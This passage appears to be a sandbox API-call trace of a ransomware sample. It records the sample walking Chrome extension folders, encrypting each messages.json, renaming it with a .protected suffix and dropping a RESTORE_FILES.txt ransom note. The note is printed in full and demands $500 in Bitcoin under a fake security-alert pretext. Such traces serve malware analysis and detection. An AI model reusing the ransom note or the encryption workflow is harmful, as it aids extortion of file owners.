lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.632] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.632] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.632] CloseHandle (hObject=0x164) returned 1 [0078.632] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.632] lstrcmpiW (lpString1="de", lpString2="Windows") returned -1 [0078.632] lstrcmpiW (lpString1="de", lpString2="Program Files") returned -1 [0078.632] lstrcmpiW (lpString1="de", lpString2="Program Files (x86)") returned -1 [0078.632] lstrcmpiW (lpString1="de", lpString2="$Recycle.bin") returned 1 [0078.632] lstrcmpiW (lpString1="de", lpString2="System Volume Information") returned -1 [0078.632] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de") returned 141 [0078.632] lstrcmpW (lpString1="de", lpString2=".") returned 1 [0078.632] lstrcmpW (lpString1="de", lpString2="..") returned 1 [0078.632] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\*") returned 143 [0078.632] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.632] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.632] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.633] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.633] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.633] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.633] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\.") returned 143 [0078.633] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.633] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.633] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.633] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.633] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.633] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.633] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.633] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\..") returned 144 [0078.633] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.633] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.633] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.633] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0078.633] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.633] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.633] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.633] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.633] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json") returned 155 [0078.633] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.633] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.633] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.633] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.634] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json") returned 155 [0078.634] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.634] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json") returned 155 [0078.635] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.635] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json") returned 155 [0078.635] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.635] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xea, lpOverlapped=0x0) returned 1 [0078.635] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff16, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.636] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xea, lpOverlapped=0x0) returned 1 [0078.636] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.636] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.636] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.636] CloseHandle (hObject=0x168) returned 1 [0078.636] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.protected") returned 165 [0078.636] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.protected")) returned 1 [0078.637] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.637] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.637] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\RESTORE_FILES.txt") returned 159 [0078.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0078.637] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.637] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.638] lstrlenA (lpString="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") returned 684 [0078.638] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.638] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.638] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.638] CloseHandle (hObject=0x164) returned 1 [0078.638] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.638] lstrcmpiW (lpString1="el", lpString2="Windows") returned -1 [0078.638] lstrcmpiW (lpString1="el", lpString2="Program Files") returned -1 [0078.638] lstrcmpiW (lpString1="el", lpString2="Program Files (x86)") returned -1 [0078.638] lstrcmpiW (lpString1="el", lpString2="$Recycle.bin") returned 1 [0078.638] lstrcmpiW (lpString1="el", lpString2="System Volume Information") returned -1 [0078.639] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el") returned 141 [0078.639] lstrcmpW (lpString1="el", lpString2=".") returned 1 [0078.639] lstrcmpW (lpString1="el", lpString2="..") returned 1 [0078.639] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\*") returned 143 [0078.639] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0078.639] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.639] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.639] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.639] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.639] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.639] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\.") returned 143 [0078.639] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.639] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.639] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.639] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.639] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.639] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.639] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.639] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\..") returned 144 [0078.639] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.639] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.639] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.639] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.639] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.640] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.640] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.640] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.640] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json") returned 155 [0078.640] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.640] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.640] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.640] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.640] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json") returned 155 [0078.640] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.640] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json") returned 155 [0078.640] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.640] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json") returned 155 [0078.640] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.640] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0x112, lpOverlapped=0x0) returned 1 [0078.641] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.641] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0x112, lpOverlapped=0x0) returned 1 [0078.642] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.642] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.642] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.642] CloseHandle (hObject=0x168) returned 1 [0078.642] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.protected") returned 165 [0078.642] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.protected")) returned 1 [0078.643] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.643] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.643] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\RESTORE_FILES.txt") returned 159 [0078.643] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.643] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.643] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.644] lstrlenA (lpString="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") returned 684 [0078.644] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0078.644] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.644] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.644] CloseHandle (hObject=0x164) returned 1 [0078.644] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.644] lstrcmpiW (lpString1="en_GB", lpString2="Windows") returned -1 [0078.644] lstrcmpiW (lpString1="en_GB", lpString2="Program Files") returned -1 [0078.644] lstrcmpiW (lpString1="en_GB", lpString2="Program Files (x86)") returned -1 [0078.644] lstrcmpiW (lpString1="en_GB", lpString2="$Recycle.bin") returned 1 [0078.645] lstrcmpiW (lpString1="en_GB", lpString2="System Volume Information") returned -1 [0078.645] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB") returned 144 [0078.645] lstrcmpW (lpString1="en_GB", lpString2=".") returned 1 [0078.645] lstrcmpW (lpString1="en_GB", lpString2="..") returned 1 [0078.645] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\*") returned 146 [0078.645] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) 
